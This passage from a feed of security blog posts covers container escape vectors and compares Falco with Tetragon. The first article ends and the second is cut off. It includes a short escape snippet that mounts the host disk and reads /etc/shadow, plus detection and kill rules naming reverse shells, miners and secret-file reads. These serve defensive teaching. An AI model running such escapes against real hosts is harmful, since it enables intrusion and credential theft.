  Vector 2: cgroup Misconfiguration — The Resource Layer
&lt;/h2&gt;

&lt;p&gt;cgroups limit what resources a container can use. But they also control access to devices, and misconfigurations can expose the host.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Device Access Escape
&lt;/h3&gt;

&lt;p&gt;If a container has access to the host's block devices (e.g., &lt;code&gt;/dev/sda&lt;/code&gt;), it can mount the host filesystem directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside a misconfigured container with device access&lt;/span&gt;
&lt;span class="nb"&gt;mkdir&lt;/span&gt; /tmp/host
mount /dev/sda1 /tmp/host
&lt;span class="c"&gt;# Now you have full read/write access to the host filesystem&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /tmp/host/etc/shadow
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This happens when containers run with &lt;code&gt;--privileged&lt;/code&gt; or when device cgroup rules are too permissive.&lt;/p&gt;

&lt;h3&gt;
  
  
  The cgroup Escape (CVE-2022-0492)
&lt;/h3&gt;

&lt;p&gt;A bug in cgroup v1's &lt;code&gt;release_agent&lt;/code&gt; mechanism allowed a container process to write to the host's cgroup filesystem and register a command that the kernel then executed on the host as root. Containers confined by the default AppArmor or SELinux profiles were protected, and cgroup v2 drops the &lt;code&gt;release_agent&lt;/code&gt; mechanism entirely.&lt;/p&gt;

&lt;h3&gt;
  
  
  Defense
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Kubernetes PodSecurityStandard — enforce "restricted" profile&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Namespace&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;pod-security.kubernetes.io/enforce&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;restricted&lt;/span&gt;
    &lt;span class="na"&gt;pod-security.kubernetes.io/warn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;restricted&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Specific hardening:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Never run privileged containers&lt;/strong&gt; in production. If a vendor requires &lt;code&gt;--privileged&lt;/code&gt;, that's a red flag.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use cgroup v2&lt;/strong&gt; — it has a fundamentally more secure design than v1.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Drop all capabilities and add back only what's needed:&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;capabilities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ALL"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;NET_BIND_SERVICE"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;  &lt;span class="c1"&gt;# Only if needed&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Vector 3: Linux Capability Leaks — The Kernel Layer
&lt;/h2&gt;

&lt;p&gt;Linux capabilities split root privileges into smaller chunks. But some capabilities are dangerous enough to enable container escapes on their own.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Dangerous Capabilities
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Why It's Dangerous&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Mount filesystems, change namespaces — nearly equivalent to root&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_PTRACE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Trace any process — can inject code into host processes via /proc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_NET_RAW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Raw sockets — enables ARP spoofing, traffic interception&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_DAC_OVERRIDE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Bypass file permission checks — read any file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_MODULE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Load kernel modules — direct kernel code execution&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Docker's default capability set includes &lt;code&gt;CAP_NET_RAW&lt;/code&gt; and several others that most applications don't need.&lt;/p&gt;
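&lt;p&gt;You can check which of these a process actually holds by decoding the &lt;code&gt;CapEff&lt;/code&gt; bitmask from &lt;code&gt;/proc/self/status&lt;/code&gt;. A minimal sketch — the bit positions come from &lt;code&gt;linux/capability.h&lt;/code&gt;, and the sample mask is the widely documented Docker default set:&lt;/p&gt;

```python
# Decode a CapEff bitmask (hex, as shown in /proc/<pid>/status) and
# flag the dangerous capabilities from the table above. Bit positions
# are taken from linux/capability.h.
DANGEROUS = {
    1:  "CAP_DAC_OVERRIDE",
    13: "CAP_NET_RAW",
    16: "CAP_SYS_MODULE",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}

def dangerous_caps(cap_eff_hex: str):
    mask = int(cap_eff_hex, 16)
    return sorted(name for bit, name in DANGEROUS.items()
                  if mask & (1 << bit))

# Docker's default capability mask (0x00000000a80425fb) includes
# both NET_RAW and DAC_OVERRIDE:
print(dangerous_caps("00000000a80425fb"))
# ['CAP_DAC_OVERRIDE', 'CAP_NET_RAW']
```

&lt;p&gt;Inside a running container, &lt;code&gt;grep CapEff /proc/self/status&lt;/code&gt; gives you the hex value to feed in.&lt;/p&gt;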

&lt;h3&gt;
  
  
  Defense: Minimal Capability Set
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="c"&gt;# In your Dockerfile — run as non-root&lt;/span&gt;
&lt;span class="k"&gt;RUN &lt;/span&gt;adduser &lt;span class="nt"&gt;--disabled-password&lt;/span&gt; &lt;span class="nt"&gt;--gecos&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; appuser
&lt;span class="k"&gt;USER&lt;/span&gt;&lt;span class="s"&gt; appuser&lt;/span&gt;

&lt;span class="c"&gt;# In Kubernetes — drop all, add none&lt;/span&gt;
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop: ["ALL"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Detection: Runtime Monitoring
&lt;/h3&gt;

&lt;p&gt;Use Falco or Tetragon to detect escape attempts in real-time:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Falco rule — detect mount from container&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Container Mounted Host Path&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Detect container attempting to mount host filesystem&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;evt.type = mount and container.id != host&lt;/span&gt;
    &lt;span class="s"&gt;and not mount.source startswith "/var/lib/docker"&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Container&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;escape&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;attempt&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;via&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;mount&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;(container=%container.name)"&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Defense-in-Depth Stack
&lt;/h2&gt;

&lt;p&gt;No single defense is sufficient. Layer them:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Build time:&lt;/strong&gt; Scan images with Trivy/Grype, reject images running as root&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Admission:&lt;/strong&gt; Kubernetes PodSecurityStandards set to "restricted"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; Drop ALL capabilities, use read-only root filesystem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Detection:&lt;/strong&gt; Falco or Tetragon monitoring for suspicious syscalls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Isolation:&lt;/strong&gt; gVisor or Kata Containers for untrusted workloads&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Patching:&lt;/strong&gt; Automated runc/containerd updates within 48 hours of CVE disclosure&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Quick Audit
&lt;/h2&gt;

&lt;p&gt;Run this against your cluster to find the most obvious issues:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find privileged containers&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .items[] | select(.spec.containers[].securityContext.privileged == true)
  | "\(.metadata.namespace)/\(.metadata.name)"'&lt;/span&gt;

&lt;span class="c"&gt;# Find containers running as root&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .items[] | select(.spec.containers[].securityContext.runAsNonRoot != true)
  | "\(.metadata.namespace)/\(.metadata.name)"'&lt;/span&gt;

&lt;span class="c"&gt;# Find containers with dangerous capabilities&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .items[] | select(.spec.containers[].securityContext.capabilities.add
  | . != null and any(.[]; IN("SYS_ADMIN","SYS_PTRACE","NET_RAW")))
  | "\(.metadata.namespace)/\(.metadata.name)"'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;Need a container security audit? We perform comprehensive runtime security assessments and help teams harden their Kubernetes deployments. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a security consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;DevSecOps services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>security</category>
      <category>containers</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 06 May 2026 06:00:05 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/falco-vs-tetragon-detection-vs-enforcement-for-container-runtime-security-10kl</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/falco-vs-tetragon-detection-vs-enforcement-for-container-runtime-security-10kl</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/runtime-security-cilium-tetragon" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security
&lt;/h1&gt;

&lt;p&gt;Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.&lt;/p&gt;

&lt;p&gt;Detection without enforcement is just expensive logging.&lt;/p&gt;

&lt;p&gt;Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.&lt;/p&gt;

&lt;h2&gt;
  
  
  How They Actually Work
&lt;/h2&gt;

&lt;p&gt;Both tools use eBPF, but in very different ways.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Falco&lt;/strong&gt; hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a &lt;strong&gt;detection&lt;/strong&gt; tool -- it tells you something happened.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tetragon&lt;/strong&gt; hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take &lt;strong&gt;enforcement actions&lt;/strong&gt; inline -- before the syscall returns to userspace. It can send SIGKILL to a process, override a syscall return value, or throttle file access. The process doesn't get to finish what it started.&lt;/p&gt;

&lt;p&gt;The architectural difference:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Falco:    syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That "human decides" gap in the Falco pipeline? That's where breaches happen.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setting Up Falco for Real Detection
&lt;/h2&gt;

&lt;p&gt;Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# falco-custom-rules.yaml&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Reverse Shell Detected&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Detect reverse shell connections from containers&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container and&lt;/span&gt;
    &lt;span class="s"&gt;((proc.name in (bash, sh, dash, zsh)) and&lt;/span&gt;
     &lt;span class="s"&gt;(fd.type = ipv4 or fd.type = ipv6) and&lt;/span&gt;
     &lt;span class="s"&gt;fd.direction = out)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Reverse shell detected (container=%container.name&lt;/span&gt;
    &lt;span class="s"&gt;command=%proc.cmdline connection=%fd.name&lt;/span&gt;
    &lt;span class="s"&gt;user=%user.name image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;network&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;process&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;attack&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Crypto Miner Binary&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Known crypto mining process names&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and container and&lt;/span&gt;
    &lt;span class="s"&gt;proc.name in (xmrig, minerd, minergate, cpuminer, &lt;/span&gt;
                  &lt;span class="s"&gt;kdevtmpfsi, kinsing)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Crypto miner detected (container=%container.name &lt;/span&gt;
    &lt;span class="s"&gt;process=%proc.name image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;process&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;crypto&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;attack&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sensitive File Read in Container&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Reading sensitive files that containers shouldn't touch&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;open_read and container and&lt;/span&gt;
    &lt;span class="s"&gt;(fd.name startswith /etc/shadow or&lt;/span&gt;
     &lt;span class="s"&gt;fd.name startswith /etc/kubernetes/pki or&lt;/span&gt;
     &lt;span class="s"&gt;fd.name startswith /run/secrets/kubernetes.io)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Sensitive file read (file=%fd.name container=%container.name&lt;/span&gt;
    &lt;span class="s"&gt;command=%proc.cmdline)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;WARNING&lt;/span&gt;
  &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;filesystem&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;sensitive&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Deploy with Helm:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;helm &lt;span class="nb"&gt;install &lt;/span&gt;falco falcosecurity/falco &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; falco-system &lt;span class="nt"&gt;--create-namespace&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; falcosidekick.enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; falcosidekick.config.slack.webhookurl&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;SLACK_WEBHOOK&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; falcosidekick.config.alertmanager.hostport&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"http://alertmanager:9093"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set-file&lt;/span&gt; falco.rules_file[0]&lt;span class="o"&gt;=&lt;/span&gt;/path/to/falco-custom-rules.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Setting Up Tetragon for Enforcement
&lt;/h2&gt;

&lt;p&gt;Now the enforcement side. Tetragon uses &lt;code&gt;TracingPolicy&lt;/code&gt; custom resources to define what to monitor and how to respond:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TracingPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kill-reverse-shells&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;kprobes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;call&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tcp_connect"&lt;/span&gt;
      &lt;span class="na"&gt;syscall&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;
          &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sock"&lt;/span&gt;
      &lt;span class="na"&gt;selectors&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchBinaries&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;In&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/bin/bash&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/bin/sh&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/bin/dash&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/usr/bin/bash&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/usr/bin/sh&lt;/span&gt;
          &lt;span class="na"&gt;matchActions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sigkill&lt;/span&gt;
          &lt;span class="na"&gt;matchNamespaces&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pid&lt;/span&gt;
              &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;NotIn&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;host_ns"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy says: if &lt;code&gt;bash&lt;/code&gt;, &lt;code&gt;sh&lt;/code&gt;, or &lt;code&gt;dash&lt;/code&gt; attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.&lt;/p&gt;
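&lt;p&gt;If legitimate shells in your pods make in-cluster TCP connections (health checks, entrypoint scripts), the blanket kill is too aggressive. A narrower sketch, assuming Tetragon's &lt;code&gt;NotDAddr&lt;/code&gt; socket-argument operator and a &lt;code&gt;10.0.0.0/8&lt;/code&gt; pod CIDR — verify both against your Tetragon version and network layout:&lt;/p&gt;

```yaml
# Sketch: only kill shell-initiated TCP connects that leave the cluster.
# NotDAddr and the CIDR values below are assumptions — check them against
# your Tetragon version's supported "sock" argument operators.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: kill-external-reverse-shells
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
          matchArgs:
            - index: 0
              operator: NotDAddr   # destination outside these ranges
              values:
                - 10.0.0.0/8
                - 127.0.0.0/8
          matchActions:
            - action: Sigkill
```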

&lt;p&gt;A more nuanced policy for file access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v1alpha1&lt;/span&gt;
